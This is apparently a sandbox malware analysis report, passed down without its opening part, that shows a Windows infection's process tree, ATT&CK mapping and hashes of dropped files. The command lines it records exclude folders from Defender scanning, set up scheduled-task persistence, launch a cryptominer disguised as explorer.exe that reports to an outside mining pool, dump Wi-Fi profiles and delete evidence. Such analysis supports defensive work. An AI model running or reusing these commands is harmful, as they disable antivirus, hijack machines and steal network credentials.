cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1870.tmp.bat""
3⤵
- Loads dropped DLL
PID:2468

C:\Windows\SysWOW64\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:1808

C:\Users\Admin\AppData\Local\Temp\asasasas.exe
"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
"C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
3⤵
PID:2472

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
4⤵
- Creates scheduled task(s)
PID:2596

C:\windows\system32\defendernottray.exe
"C:\windows\system32\defendernottray.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
4⤵
PID:2800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
4⤵
PID:2324

\??\c:\windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
5⤵
- Creates scheduled task(s)
PID:2904

C:\windows\system32\microsoft\libs\sihost64.exe
"C:\windows\system32\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:2892

C:\windows\system32\defendernottray.exe
"C:\windows\system32\defendernottray.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
PID:2492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
6⤵
PID:2908

\??\c:\windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
7⤵
- Creates scheduled task(s)
PID:2308

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:288

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
3⤵
PID:2464

C:\windows\system32\trayfontdefender.exe
"C:\windows\system32\trayfontdefender.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
4⤵
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
4⤵
PID:2240

\??\c:\windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
5⤵
- Creates scheduled task(s)
PID:2620

C:\windows\system32\microsoft\telemetry\sihost32.exe
"C:\windows\system32\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:2440

C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
"C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1760 -s 1700
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
"C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\system32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
3⤵
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
4⤵
PID:2264

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2196

C:\Windows\system32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
3⤵
PID:2832

C:\Windows\system32\findstr.exe
findstr All
4⤵
PID:2952

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:2924

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"
3⤵
PID:2620

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:2460

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
"C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\skgrznb1.cmdline"
3⤵
PID:2400

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8170.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8141.tmp"
4⤵
PID:2692

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe" --install
3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2860

C:\Windows\lsddsds\lsdds.exe
"C:\Windows\lsddsds\lsdds.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2544

C:\Users\Admin\AppData\Local\Temp\olsdd.exe
"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 2544 /protectFile
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Users\Admin\AppData\Local\Temp\olsdd.exe
"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 2544 "/protectFile"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
1⤵
- Creates scheduled task(s)
PID:2576

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
1⤵
- Executes dropped EXE
PID:976

C:\Windows\system32\taskeng.exe
taskeng.exe {92DAC03C-4ABA-456B-9156-3512B67ACD14} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:1864

C:\Windows\lsddsds\lsdds.exe
C:\Windows\lsddsds\lsdds.exe
2⤵
- Executes dropped EXE
PID:3032

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ee75929-98e1-4ef4-9a32-6401cbbdbcf3
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2e3388e5-f018-49d0-b592-5e28f5493289
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3fdebb3c-7ec9-4206-80d2-87d066cbcc85
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b0defdc-6cb5-4f1e-a1ef-96ce0aa8443b
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c35972d8-5622-4c80-b085-1ca35b9af862
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_def3f345-da71-4c4a-9419-803178e10508
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb48f16a-da2f-4af8-bb52-101940582f49
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
c3374a04eb6c701ebc3bf582fda64507

SHA1
cb93d99aa064fd81674ea04f6f450f14767002e4

SHA256
1a086cc0a4954ed8a3f0099ba287c7c231a8b9a0b7f532701bb4fb871e6113a9

SHA512
3fdbcf3b44a66c90d61975c678bd0cf8e0df8b84d910b3e225d647b5772b98027f9edf07c0f9d32a40f8f8df9fd264deadf7fc8d6d16a669158d44adf67a9fe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
dcc52ac5ad7569b2c0b54df3720d21a4

SHA1
33169bdc6a69fb4c26f54d5446ade26f7fb1c796

SHA256
44633c61970fc10c8b22900012fbdf8ddd36960f0b93612f4a076c2e6e70a991

SHA512
b86001478384bac21a3dfac59958c9f1c67bb8d6b9127176140e35b710d29a16be3dee8eb8180d5bc8efc0543c6a8593253e03974579d53b30392c4488109dc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
dcc52ac5ad7569b2c0b54df3720d21a4

SHA1
33169bdc6a69fb4c26f54d5446ade26f7fb1c796

SHA256
44633c61970fc10c8b22900012fbdf8ddd36960f0b93612f4a076c2e6e70a991

SHA512
b86001478384bac21a3dfac59958c9f1c67bb8d6b9127176140e35b710d29a16be3dee8eb8180d5bc8efc0543c6a8593253e03974579d53b30392c4488109dc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
MD5
f66e55cb2019425ba694948cc0355560

SHA1
30d2e88f4da43baa0055ce592bbdbd13e0f7244a

SHA256
8439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7

SHA512
e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23

Download Submit
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
MD5
f66e55cb2019425ba694948cc0355560

SHA1
30d2e88f4da43baa0055ce592bbdbd13e0f7244a

SHA256
8439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7

SHA512
e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23

Download Submit
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
MD5
ad8e052d00bfc89e09c047f048ea63da

SHA1
c1d0dba06f790d20794039970fe61d94479ee6f9

SHA256
ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab

SHA512
b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
MD5
ad8e052d00bfc89e09c047f048ea63da

SHA1
c1d0dba06f790d20794039970fe61d94479ee6f9

SHA256
ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab

SHA512
b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
MD5
2ed63566ece20dbdfbb8bed11e075ddc

SHA1
b7d411fa43c83fceabc557368edab88c23b0a5c7

SHA256
a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a

SHA512
a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69

Download Submit
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
MD5
2ed63566ece20dbdfbb8bed11e075ddc

SHA1
b7d411fa43c83fceabc557368edab88c23b0a5c7

SHA256
a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a

SHA512
a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8170.tmp
MD5
1157eaca5097d5da8f5fdd9e3c8306cf

SHA1
83c0824e453af48def2095018221e818431a48c7

SHA256
bae5d933cfafa88f01547654e9460294a0a379699e59f669b6a67a629d095c53

SHA512
d44ea8fe38dc34626f47981c7e4077bd0303db44aa1855280ac2f7d92c1e9ca7bd65f9d63e1f622b1acdeede2b1feeac7b00a6f1d9de60eedef35f2f998eca79

Download Submit
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
MD5
5ec2741199ca8f45f24e4d1f943df63d

SHA1
c72b4d4ca24bee746106611268ff1b85461aa561

SHA256
444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3

SHA512
e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
MD5
5ec2741199ca8f45f24e4d1f943df63d

SHA1
c72b4d4ca24bee746106611268ff1b85461aa561

SHA256
444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3

SHA512
e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19522\python39.dll
MD5
5cd203d356a77646856341a0c9135fc6

SHA1
a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

SHA256
a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

SHA512
390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\python\python.exe
MD5
97a51fcdffeac1ea53ede5c91607a73e

SHA1
1c95c43b104a7faa79691714556c2c7b5d153697

SHA256
0c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26

SHA512
